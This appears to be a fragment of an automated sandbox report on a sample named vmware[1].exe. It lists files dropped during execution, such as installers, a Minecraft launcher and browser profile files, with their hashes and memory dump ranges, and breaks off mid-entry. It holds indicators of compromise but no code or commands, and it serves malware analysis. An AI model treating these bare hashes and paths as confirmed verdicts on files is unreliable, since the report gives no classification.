C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\7UY3WOJS\vmware[1].exe

MD5 68e634af1eafb17618018de02dd47be7
SHA1 bdc653c130d96a32edeb4f2bc48203432b448498
SHA256 2d316619d2522838df93cbb8392c4c3a053279d92e586ccd63431cadfbe7816d
SHA512 8220a64c8f89d0c30d42e5bfcf770a26422604ea37f48fbcade5679f42bfb474966203cb5bbd2f29f51e435f7f8e04e168e112b2ed3eb419a46536aa7b947071

memory/3864-15-0x00007FFCC1673000-0x00007FFCC1675000-memory.dmp

memory/3864-16-0x0000000000A10000-0x0000000000DE0000-memory.dmp

memory/3864-17-0x00007FFCC1670000-0x00007FFCC2131000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\WTLDR.exe

MD5 7a94013c17dc892cea16fbae38646e43
SHA1 8cf54c2ac961dd5c82cb3b07c3de317847aa94bb
SHA256 cd35af0a0c71c382760409b7b2343c83857d89af55a0b365b72962f0f9c9a400
SHA512 03df47db51270ca87172620e5475ce7a99e1fa1bd61e1956e4a0b28792d145b4e30d5b0d7b0737ea3ed331cecaecde78641b4828b1b9425153b1f9ac3de6f34a

memory/4116-29-0x000000006F7D2000-0x000000006F7D3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\KLSetup.exe

MD5 65f0ee72fac85b324a0734053d436918
SHA1 796d3ab9803f5e6ec370ff948f654842af62fd25
SHA256 4f128c759e90606c9c7b5546259a7888b2aaaf5ea59d1aa40d5284056366504c
SHA512 b18d612652d2023b7ca49bf0008d6f6a77bab25c70fb9d67bd29c4a917344275c2fbe14058e8121e0ec3e2278ae100b66e49494aa63a2d2570d7d95b6c64ed52

memory/4116-39-0x000000006F7D0000-0x000000006FD81000-memory.dmp

memory/3864-40-0x00007FFCC1670000-0x00007FFCC2131000-memory.dmp

memory/4116-41-0x000000006F7D0000-0x000000006FD81000-memory.dmp

memory/1284-42-0x0000000000A80000-0x0000000000A81000-memory.dmp

memory/4116-52-0x000000006F7D0000-0x000000006FD81000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\yadl.exe

MD5 2b0d2f77d8abade07a3dd9a8152ad111
SHA1 e7c0ad498f361e3c2d5a0ffa225ee112ed3c5bdb
SHA256 85ddc30b6b53ebe529688528e74bcfd74df0b93ea29ee1693d7d9aeec4d48776
SHA512 d48a3b9d9d3f83f1b0498103ee1f78467dc84254c762227081ba3218bd2212c1e3c29d2d94737101d55f5793f3d7dca8bdedc7d527cdb701733a6cbc74c938fc

C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe

MD5 3fb846d3691f3d98a34e669e1b9b5bf6
SHA1 4c90c2912aae3b8da4c44a4faa0b8df20525285f
SHA256 ead7a779cabae642d09be07283cc99e53c84ecf90349444e0d0ac4bf9901fe47
SHA512 e904ecfa7b1c9ba066272bf91b8341bf3877310613370defabee7db58ea825c52582353e97f9398d706d3f3890b3701a1c05fe202e8a87499fb9600f87176b3e

C:\Users\Admin\AppData\Local\Temp\YandexSearch00000.log

MD5 b9760b39794e8f100dbbe16f50afa62f
SHA1 5433303238e92d66d0a390e4e37eba5c77c3799a
SHA256 970a367b703c6c91799b80c82273d6c3160e41cd02c9de293aca6ee240d7aaf8
SHA512 1f25acbc1ab1b286b1e766f9b8ca65990c66744d9d82f14a0f2c35fdcac52d81f40d48f11997edfd66994fd9a68996dfa25ae42f9083f2ea4dc654f79f050ee9

C:\Users\Admin\AppData\Local\Temp\{5B964E0E-B9A3-4276-9ED9-4D5A5720747A}\YandexSearch.msi

MD5 561f202d40eb1a21aa947b2b833f6928
SHA1 b48e2f49a416847aa9420ed4b360841e8c28f67b
SHA256 b2fda5fb2d8e65fc0448d308647d8afd1e4ecd7bff0103ec3700e0798a7db0a3
SHA512 66d172f336ef0b4790e2141711f205682a0ba6ced8d03f26e33b54f6ea1e29be10d387e843df26d1110559888b09a3cdf9198ea40f17ca9d2ac1872c1da82063

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\357F04AD41BCF5FE18FCB69F60C6680F_394487CAFBCFB8C5917AD7A10924C8A7

MD5 1468177f7f9dcf80975223275c67bc1d
SHA1 f944d670a602a9e7d2628d0570fbfee1062fc49a
SHA256 b77d9353851419c6adc1eb4288c734f9589bdf871525f87487990b3a4db5816f
SHA512 e0b076dd1f2b62bda3bb5ef29620cc711655ea976428ca7564c559e98b1f223e7f03d783649278d44113c4d1c406a58a9e3dce34f4b175dea0965e30cf859f7a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\357F04AD41BCF5FE18FCB69F60C6680F_394487CAFBCFB8C5917AD7A10924C8A7

MD5 4f5d956c5b4bd5351d2be965c67f361e
SHA1 229f5d2c9057853af96a7c01a874f8453e1a3d3f
SHA256 9e93c11504999e78b5508b08fc0a984a5b64248be5bae474632238a35811da01
SHA512 c5b7eed9c1d4ffd66dc4e54b97e78d48dfaab8aa3094fb7587a4aed1b2881e69cf4c4b586f4ead024260308bf2d9c1b023a7c1f48c5373d9c337795066870b91

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9CB4373A4252DE8D2212929836304EC5_1AB74AA2E3A56E1B8AD8D3FEC287554E

MD5 453e545f12ef9e011e989a2b63e92ac9
SHA1 558a9ab9f8e6a8c4fceb4dfd67d01edc90a93393
SHA256 43fb7de5ca016b1777db62838fbcf59d0ea40b63c5ac41a11400d31f23a34469
SHA512 3644bc2c4e78f88baefbc1640b4cea67772f40e3b306542bcff581fd9c96264b3f6c9b5cbdbae50af373a56d50d444d46c3a5b2317880a6a257a59528f7c7091

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9CB4373A4252DE8D2212929836304EC5_1AB74AA2E3A56E1B8AD8D3FEC287554E

MD5 e73658a9b3672f2ce712365fef373306
SHA1 3f268986e566e39340e0baa0ea80ad1ee9c3c589
SHA256 87e6f70b31ee8800c5cd1d9293ab8ee72e3707ec51ec96d72712f4d07f242a9c
SHA512 2f0e2f8417136bbf156eed1b3704d7f8ad688aa81bcbdd9f20850fcdde81fea786ee03aa1236fadeef7b864d7840fa1d83f83a5ab016f49fe89217b31d258cae

C:\Windows\Installer\MSI53C8.tmp

MD5 0c80a997d37d930e7317d6dac8bb7ae1
SHA1 018f13dfa43e103801a69a20b1fab0d609ace8a5
SHA256 a5dd2f97c6787c335b7807ff9b6966877e9dd811f9e26326837a7d2bd224de86
SHA512 fe1caef6d727344c60df52380a6e4ab90ae1a8eb5f96d6054eced1b7734357ce080d944fa518cf1366e14c4c0bd9a41db679738a860800430034a75bb90e51a5

C:\Windows\Installer\MSI54A4.tmp

MD5 e6fd0e66cf3bfd3cc04a05647c3c7c54
SHA1 6a1b7f1a45fb578de6492af7e2fede15c866739f
SHA256 669cc0aae068ced3154acaecb0c692c4c5e61bc2ca95b40395a3399e75fcb9b2
SHA512 fc8613f31acaf6155852d3ad6130fc3b76674b463dcdcfcd08a3b367dfd9e5b991e3f0a26994bcaf42f9e863a46a81e2520e77b1d99f703bcb08800bdca4efcb

C:\Users\Admin\AppData\Local\Temp\vendor00000.xml

MD5 a96e6071a17b74bbd309bf696496b8f7
SHA1 63c1ecf860504d390b6f3a32982ddd8946b042c5
SHA256 1a855972dc308e47d30d567e1b37fdad349bf555b971bc14ead76e17a8accccc
SHA512 2c906e2f11d62d1336be482cc5ff784bf372cc7afb3263754e7810a1ae27e253aa9e22463456b62a25049d33ba1e69f129ed7e0a0273fe928dcaa216b7876449

C:\Users\Admin\AppData\Local\Temp\E6E36528-865A-4F67-A4B6-616A6EA2DAD6\lite_installer.exe

MD5 aafdfaa7a989ddb216510fc9ae5b877f
SHA1 41cf94692968a7d511b6051b7fe2b15c784770cb
SHA256 688d0b782437ccfae2944281ade651a2da063f222e80b3510789dbdce8b00fdc
SHA512 6e2b76ff6df79c6de6887cf739848d05c894fbd70dc9371fff95e6ccd9938d695c46516cb18ec8edd01e78cad1a6029a3d633895f7ddba4db4bf9cd39271bd44

C:\Users\Admin\AppData\Local\Temp\45FA5734-C188-4A17-BD53-A04B9DCA00A5\seederexe.exe

MD5 225ba20fa3edd13c9c72f600ff90e6cb
SHA1 5f1a9baa85c2afe29619e7cc848036d9174701e4
SHA256 35585d12899435e13e186490fcf1d270adbe3c74a1e0578b3d9314858bf2d797
SHA512 97e699cffe28d3c3611570d341ccbc1a0f0eec233c377c70e0e20d4ed3b956b6fe200a007f7e601a5724e733c97eaddc39d308b9af58d45f7598f10038d94ab3

C:\Users\Admin\AppData\Local\Temp\clids-yasearch.xml

MD5 42f904227d6a52fb123a1cbae34f3373
SHA1 c0f5cfee6915bf65601aed5c662e1696f2b45fa0
SHA256 c25e6de10909a6c4a45a4e1e93d0eff1b3604cc515cc6ef2ae6b083ffe41a200
SHA512 b4c8dc57811b0c3d03f00a088bc16ed6eb02ed07db2a99681fd550b8a79e108b82053a3e4d9e12789b429a501bb06e8a684314322605eadcee7b9c633c13a669

memory/1284-205-0x0000000000D60000-0x00000000015A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp696aaaaaa

MD5 fefc3d677388386c29d8720c15b9db3f
SHA1 370f1f40ae5c652d87b3b8f42e67d827af2b1754
SHA256 74d5e8d3cd8d659d8df8e6f306832dfc252e1a6e676bb60334e31b5943deb4fb
SHA512 b462ca1ffb0798bedc39c945daa75ff73e0efbb1c6dfdb262e6b2936158933f514f0b4169e811069df11aaeaebd39c826ce0caf9f6eb6d77de249fca6abe39fe

C:\Users\Admin\AppData\Local\Temp\omnija-20245523.zip

MD5 dc5128fcb8d7f6b849f1166532db2dc8
SHA1 8427501d440d5edbbb2662294bc5650d2bc8aab5
SHA256 36e682f419c2b5d8e7c285d36088b56d59df3869dbd181943280696d4ca391ca
SHA512 bcf0d463ed4f01a313b8e6be745ad55b42108be84cc5850c411dec19aa7c6d996782da49fc208559f1188941bdd1082d954cfa316f08c0ad2efcf0662952e524

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

MD5 a11b3e48b8e072b77a5b58538bbeb752
SHA1 73b09ee489f44a3614410e114f1ac3bddb817ec3
SHA256 a719089dfdfc79bc33448d12b87e60701885ab7ad00978c5a73f0e1e6bb3e95a
SHA512 92328419f5a119ebe58beed7fcbbc897621923e5f4562003aadce9aeeaa48d776e9a536108ca8f24cd77c95739f8dc8b0b5b62730fb9ba72f8419e9c65c7c0f1

C:\Config.Msi\e585041.rbs

MD5 f3a0cfd72a674f7fed51c89e176c7761
SHA1 3e60c50bb9bad402e98fbd3a70b911def04b7be4
SHA256 a4f8abbe7c7ad95a002d372ec2f957ebc557cb32d4cc994fcb2d03dbedf990cd
SHA512 c527436deab917e68edd5c506da472c9e7187b9f911a07b251e3ab2dff4a1c0ecb09fd26cedad503ba2d096efac136c0571a0bc85afa66870ca7efe039154e2b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

MD5 99963563146961bcd160d909efb7ec06
SHA1 429c768b163bd30bd5caafd8059ffa3ca882de7a
SHA256 8cbff55b9dabfe2305098238d618bb4dcd6ff2971e3d235f4779b023eda1d0b2
SHA512 52c7ee0791f74645b4cee9231b41478b7fb4f5b5db546f585ec13e68cdda356fd91d5695f892816a51ed337cbf3616ce42b60385bed05a092b7a9086c6ded60f

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\versionlist.xml

MD5 1a545d0052b581fbb2ab4c52133846bc
SHA1 62f3266a9b9925cd6d98658b92adec673cbe3dd3
SHA256 557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1
SHA512 bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kwvh0l1k.Admin\places.sqlite-20240623215540.456238.backup

MD5 314cb7ffb31e3cc676847e03108378ba
SHA1 3667d2ade77624e79d9efa08a2f1d33104ac6343
SHA256 b6d278384a3684409a2a86f03e4f52869818ce7dd8b5779876960353f7d35dc1
SHA512 dc795fa35ea214843a781ee2b2ef551b91b6841a799bef2c6fb1907d90f6c114071a951ebb7b2b30e81d52b594d447a26ab12ddb57c331e854577d11e5febef5

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n9vxbo99.default-release\thumbnails\af9aab32f3a8d77462d5c418f4f0b55d

MD5 2d0a37bb716f9ad9fb916eb8b08d34c4
SHA1 48658fb5f716478bcfa239ba635589184edc33cf
SHA256 a08d93fef42579ebf000b3496ae50837ba14024fd07df04304534de480c72a1c
SHA512 15216319722cd68b7e0018cfd360a3ef3ba512a0686646677b51f4926ee8290f984e72fdd5a815dc5fdfc7170e8d9b2f207413574c96c7189291140475fe959b

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n9vxbo99.default-release\thumbnails\68f79a69daa8bcc89cc24690c2324c3b

MD5 af80a936c10e18de168538a0722d6319
SHA1 9b1c84a1cf7330a698c89b9d7f33b17b4ba35536
SHA256 2435c0376fca765b21d43e897f4baa52daa0958a7015d04103488c606c99d1d3
SHA512 9a1325c8ce05806e5c161a4cf47239f62baad8f79650fbd713e74928fce8171ced10ba7f24fac46c548e1dbf3f64106270cb25ca88c836c870107f5dc1f97879

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Services\www.ya.ru.ico

MD5 a6f6261de61d910e0b828040414cee02
SHA1 d9df5043d0405b3f5ddaacb74db36623dd3969dc
SHA256 6bb91f1d74389b18bce6e71772e4c5573648c1a4823338193f700afdf8216be5
SHA512 20cb7b646c160c942e379c6e7a1a8981a09f520361c0205052c1d66e2fdb76333ffaaf0ca1dfc779754f0e844b9946900fbd5690d01869e1607abc1fda6dffab

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks

MD5 c8ec9e6df3c365ec618433b7b317ca37
SHA1 01a7827c594e1ef77582125fb229bea876082a29
SHA256 12f8dbad0d744ae515807a4639daf28439fc0e9a5f7d6c6a71180cfef8d92b6c
SHA512 ea2de7651fa8a640f7814037db801ecaed40d9de72930f21ae733bd0f3be1571517b05332fdd38fb8b63cde6104732b8045538897eac4f3231412a5d710cd1e1

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\BookmarksExtras

MD5 48494b56c9b431d0e3283627a8e21c8a
SHA1 947054c2e5e73a1ed1198d343b42e33be16a5270
SHA256 d07780b45981c7728f70278b05181e493e25396966b8ef100e15917fc69de95c
SHA512 b318ea6c2a011088a269853d8263c84bdcf31857b983513ec0f39ed777e6c029064b995a176d580d75e9057fc9286f94597dc21f9619c4b0bbe02839228f39a4

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks-20240623215541.862481.backup

MD5 3adec702d4472e3252ca8b58af62247c
SHA1 35d1d2f90b80dca80ad398f411c93fe8aef07435
SHA256 2b167248e8136c4d45c2c46e2bff6fb5e5137dd4dfdccde998599be2df2e9335
SHA512 7562e093d16ee6305c1bb143a3f5d60dafe8b5de74952709abc68a0c353b65416bf78b1fa1a6720331615898848c1464a7758c5dfe78f8098f77fbfa924784c0

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Preferences

MD5 e9f8dc645f24212e3a6a0e17a9b3f8a0
SHA1 28cefae18c56e194da88353557f3a453281d54a8
SHA256 fd257ef82dd4ab28c302c42b6623aae32fd18c0da806821251cdf9f6c172d9fd
SHA512 a7da60b3202b73a703c55dff4d12438447c93c897dcbbae2b1b6062177c92442e69e135cd647ce26f20af28340bcedbec44f21b09434280b51001e055d827724

C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe

MD5 95828ee007d3586792d53ace50b2357e
SHA1 3501ccad7573fd467911f207155318db3a1a1554
SHA256 8c4be5f1bc4e2f73d4396af48a31bf10362006472e9b28f40aa91f73a3815f12
SHA512 9896eccb178fd772fc92e5793340bdbc1bd6169465d9a739df06c1154edbce16f6db5dd50df426ccbc40d8410d4ef170c3fb0bc700e7778149ff2168409638e7

C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Яндекс.website

MD5 d2fdab99df8a05cb2233b2b190fedbca
SHA1 3303cd68c1732e6cde273faa7789cff16f526aee
SHA256 c4a08741f47df82e576f3cedc286d0dd8698a38c0967d4a9eaf1c7ddc02817cc
SHA512 59eea6dd75c1987e7c2627f22be86a8521afbdde7c08b41a167241d98ec7717683ac4ca3db86a75220193f5ba9fd5ef8ce86d9a5a8cf7df43fa3f8ff090fcc0c

C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.lnk

MD5 b73ac5b2279039e864e54a39501fd860
SHA1 51e092afd0eb71ea9454b96aad3bf2d3fc3b46d5
SHA256 e549fdc81d788f4e62594f31e6f414a3c314725449ed2f7d53e00b6017bcaaef
SHA512 0636c7cde979cae4c1e04e5e1a6d29798d6cd623519f354804ffec52bd77145584712fb75d5b2ffa3b16ee45d0f605403ecf2730d5c333d79eb09bce83159578

C:\Users\Admin\AppData\Roaming\Yandex\clids-yabrowser.xml

MD5 27a0d63958d264b1d1b307cbcae32d1e
SHA1 134e6abcb95aa2aeddce10db6325d47d5c2944eb
SHA256 e0148740e2dc882bc85880bdb6c626e4fb6555daf471bf34b4a4689c0634abc7
SHA512 33fb4c7c53efc8b6d77baac7fbb7a9848949029de8662ee9e663febc92fd426babc7c2200bf2890e70aa932df5bb883d409fe3ed50a41e3436dfcabe7a1bd229

C:\Users\Admin\AppData\Roaming\Yandex\ui

MD5 7c46cea88230d3d4d3d124f3db5063d3
SHA1 40193051dcba02f6f74f838ebe4b72c4effa14ab
SHA256 9068d48477914e99141a8e484ff16b1800f4acba9692e718e96ce37264a15e3e
SHA512 8906f6ac6b5f49c0c2ab1995b9b40d55992f7b9551be0d53bdd2cf47d532fb4d4429eee5540671ceeb240f16ba4988fe1e11f84285f23ce00ba0cb045dfad601

C:\Users\Admin\AppData\Local\Temp\6920E5B4-1D3A-475A-9E68-F99DF9289181\sender.exe

MD5 f1a8f60c018647902e70cf3869e1563f
SHA1 3caf9c51dfd75206d944d4c536f5f5ff8e225ae9
SHA256 36022c6ecb3426791e6edee9074a3861fe5b660d98f2b2b7c13b80fe11a75577
SHA512 c02dfd6276ad136283230cdf07d30ec2090562e6c60d6c0d4ac3110013780fcafd76e13931be53b924a35cf473d0f5ace2f6b5c3f1f70ce66b40338e53d38d1e

memory/1284-8512-0x0000000000D60000-0x00000000015A5000-memory.dmp

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\plugin2\msvcp140.dll

MD5 bf78c15068d6671693dfcdfa5770d705
SHA1 4418c03c3161706a4349dfe3f97278e7a5d8962a
SHA256 a88b8c1c8f27bf90fe960e0e8bd56984ad48167071af92d96ec1051f89f827fb
SHA512 5b6b0ab4e82cc979eaa619d387c6995198fd19aa0c455bef44bd37a765685575d57448b3b4accd70d3bd20a6cd408b1f518eda0f6dae5aa106f225bee8291372

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\vcruntime140_1.dll

MD5 fcda37abd3d9e9d8170cd1cd15bf9d3f
SHA1 b23ff3e9aa2287b9c1249a008c0ae06dc8b6fdf2
SHA256 0579d460ea1f7e8a815fa55a8821a5ff489c8097f051765e9beaf25d8d0f27d6
SHA512 de8be61499aaa1504dde8c19666844550c2ea7ef774ecbe26900834b252887da31d4cf4fb51338b16b6a4416de733e519ebf8c375eb03eb425232a6349da2257

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\vcruntime140.dll

MD5 7415c1cc63a0c46983e2a32581daefee
SHA1 5f8534d79c84ac45ad09b5a702c8c5c288eae240
SHA256 475ab98b7722e965bd38c8fa6ed23502309582ccf294ff1061cb290c7988f0d1
SHA512 3d4b24061f72c0e957c7b04a0c4098c94c8f1afb4a7e159850b9939c7210d73398be6f27b5ab85073b4e8c999816e7804fef0f6115c39cd061f4aaeb4dcda8cf

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\lib\deploy\messages_zh_TW.properties

MD5 880baacb176553deab39edbe4b74380d
SHA1 37a57aad121c14c25e149206179728fa62203bf0
SHA256 ff4a3a92bc92cb08d2c32c435810440fd264edd63e56efa39430e0240c835620
SHA512 3039315bb283198af9090bd3d31cfae68ee73bc2b118bbae0b32812d4e3fd0f11ce962068d4a17b065dab9a66ef651b9cb8404c0a2defce74bb6b2d1d93646d5

C:\Users\Admin\AppData\Local\Temp\{D75E8FFB-E220-4A56-8F34-15BD8F50E315}.exe

MD5 bf2e1399a1e08ae36658b0aaa7fd5a99
SHA1 4d233713a23a77309a9470e13ae82c2a83cd8ae8
SHA256 c816c0bc31ab41c33f58bc4d3fbabd32bb4e06c7a0044d21a5e626f6bbfb9809
SHA512 8cbd230ebefbbd8a12780b60dff83a8543369e851ffc97fa2d5480432e69247eda671ba01a1200dd0adeae4aeb2518322e0564852a599f2c871aa440c0ee192c

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\lib\images\cursors\win32_CopyNoDrop32x32.gif

MD5 1e9d8f133a442da6b0c74d49bc84a341
SHA1 259edc45b4569427e8319895a444f4295d54348f
SHA256 1a1d3079d49583837662b84e11d8c0870698511d9110e710eb8e7eb20df7ae3b
SHA512 63d6f70c8cab9735f0f857f5bf99e319f6ae98238dc7829dd706b7d6855c70be206e32e3e55df884402483cf8bebad00d139283af5c0b85dc1c5bf8f253acd37

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\lib\security\policy\unlimited\US_export_policy.jar

MD5 12f971b6e65cbc7184701235469f0339
SHA1 06cb165157c5e0078b872c48707a1328b1dcba19
SHA256 84e035372ca8979bb4a387428a74942ffc7248a0e61988b7033b5b266cd187c8
SHA512 58646fc81de2e4750a3259d79a207a8cff2dc6692f178a63d92a453fc408c8d1088007ef4e93157d1017be706565716a0236039dbac848c40745a0ad89c4d0de

memory/1284-9665-0x0000000000D60000-0x00000000015A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\lite_installer.log

MD5 37f5101a700b1112862cee0b20ea005f
SHA1 01bec9b57b54f0d5487d2f721d8b9bdff0af7d30
SHA256 22f57cf5138807fae125a47010cc884737aab2ce5efcc8ac1443d0dcb34113bb
SHA512 f68d4f5cd3caa02a438d6492d93c99280560264252126b07735d07338d95639aa287717f61eb87c9a1e0bf1cd58207bfb4172f04adb31513908c14556ace1119

C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe

MD5 82345958a39e7b1ad0b14ff2adeecaf9
SHA1 56e29f91f3ca1d5a3712e339ea5ac70f2904fbf7
SHA256 5fdc5fd46f4fbd5f1377c9cde1370b34bef76aec16f7ac3bcb89a1ee59329f99
SHA512 1182da48e1be07c2b21036336446e4af55dfc4f4fd1602701cf2a2c56ead437d9be5d994948f7b863215cffe1b627ff4331e4635db12f9eaf9d6ea7b6bf98ea2

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe

MD5 122e34bfa3146ef9ae5a51fdc744353f
SHA1 f0cc2294fe150a4cceca8a3da8615edcc4eb20e4
SHA256 dd2169db3358ccdf4a4a185e4a22955c989eaa3b9d3e0e6025599b8fa173c968
SHA512 306341e00598f02a70d3edc6ef666cb64982f1e31e5c0a1304977a1700c95395c1c7f0857ae8056853370eced0bd2aeafc72da804a65f98c1422929b7c431700

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\lib\amd64\jvm.cfg

MD5 499f2a4e0a25a41c1ff80df2d073e4fd
SHA1 e2469cbe07e92d817637be4e889ebb74c3c46253
SHA256 80847ed146dbc5a9f604b07ec887737fc266699abba266177b553149487ce9eb
SHA512 7828f7b06d0f4309b9edd3aa71ae0bb7ee92d2f8df5642c13437bba2a3888e457dc9b24c16aa9e0f19231530cb44b8ccd955cbbdf5956ce8622cc208796b357d

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\java.dll

MD5 583e8b42864ec183c945164f373cb375
SHA1 5ec118befbb5d17593a05db2899ee52f7267da37
SHA256 9bc9178d3f4246433fe209a0f5ca70e77568e80c928268c78f8c8b00107ce6ed
SHA512 1feaac37bac19bde93171ebda2e76a65e9d5472a503b05939f6977b3a4d94d131298f3989dd048d7617ecd69cf09db7ac986fc39f0df9f56c84ea01726d0c898

memory/1284-9827-0x0000000000D60000-0x00000000015A5000-memory.dmp

memory/25568-9839-0x0000020365770000-0x0000020365771000-memory.dmp

memory/25624-9840-0x0000000000400000-0x000000000042F000-memory.dmp

memory/25284-9853-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

memory/25284-9856-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

memory/25284-9858-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

memory/25284-9868-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

memory/25284-9881-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

memory/25284-9895-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

memory/25284-9921-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

memory/25284-9919-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

memory/25284-9944-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\+JXF6331744818194215720.tmp

MD5 99c471b10eb25b8f0f1fe76a04926b0f
SHA1 807f89e70ccf186bde048c8a51a5c2d668190797
SHA256 9042ee73964614ed6b3eb4aa30df23c4ac5d3372deffb201ab9287540a34079c
SHA512 cbc263c2fbf1325c56adb312be8026ec25766a172bfd8d742a2e86292692c18fb185f595eb8b6fa2898e66ff95404ae52d9e52c393271e9f1fbbfd6c5bb9707d

C:\Users\Admin\AppData\Local\Temp\+JXF8596370695927296266.tmp

MD5 794162f5ab873e624c2e8adaef34aa73
SHA1 5e631244b866752f9232e170ed81ab94d252ac42
SHA256 b272fda2af48d26da480cd02d76059416539612615d38b9145b3f156d677ef7c
SHA512 d14a8abf8a3a4279652132ec145c5fad024001241e6c81d1e07c74ad3d438d61ea6f2e2a3d01812621763afbda99486ebe47f858a8dbd440c82448b1619a2426

memory/25284-9973-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

memory/25284-10000-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

memory/25284-9985-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\+JXF8192543535060456216.tmp

MD5 945426f5363c482553695c661ebc75a0
SHA1 feb3a62b783c6cba5175e957c6a4d1564e6de534
SHA256 b04761b165a8b32e5ac989a3cee07f27658634e7796f708b3e17ff5ccbe23622
SHA512 12658f86b8c3744329c2a4c4552ce25c5756e29aa984e0c7fd3fdee13abaa51b221d8ff78a9c406b084d3c08fffc3cdcb2b58f9cfb6af707ab9e3bc8fcee9e98

C:\Users\Admin\Videos\Captures\desktop.ini

MD5 b0d27eaec71f1cd73b015f5ceeb15f9d
SHA1 62264f8b5c2f5034a1e4143df6e8c787165fbc2f
SHA256 86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2
SHA512 7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\java.exe

MD5 1562e15220d8771fcb11b9a5b234a970
SHA1 50ec8e4e7125bda147a1b2ccc2b2827db2dc3479
SHA256 366199821c1efede3f7112d21da045fd6bf38b56fb3da1ae9d6493c4ddc1861f
SHA512 a07873f0a5381d202a6439a3245dd51f405cdcec4a9d40ff6ffdd4670a3b218008f7288a89e2a7455782c677d4c661bda96e62f813ce7d8c1f20a6c4c7c2b31f

C:\Users\Admin\AppData\Roaming\.minecraft\klauncher.json

MD5 57c3e459faf3f11f2703b43ebec49aed
SHA1 5afea178ac17047d3ad276a686858a40cdf833c2
SHA256 aa5edc077278a5985b07710342f0cf470f37d74709e01bc58f8b7e946f685d41
SHA512 81bf054b31925192bf6c615b50b599bf874584583d940b4f8f04aee092091a75fc776b99f77fe0275e7c7ce45d43ab5aa6113e24292b8b40ffeec674c0e0301f

C:\Users\Admin\AppData\Local\Temp\master_preferences

MD5 5c627a0acb0b4aa6850222290d1b9b30
SHA1 dc52e262636616c0524a08bbbffb62a8b9eab9ce
SHA256 15cbe382487e05ebc052b8ae3155e4ffbbb515bce90a76f15cda47e076a037d1
SHA512 6250e074b4d65e19ef50b1d7389af8e4ae7b97a47582c774c6dded0a5bde2919236cf991a0652d42e042392582e1a92adca9094f5b32015166ffd8b0f2ee7920

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YOJF4VYG\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\configs\all_zip

MD5 33b0f0599e46c248c6e7f41553fa707c
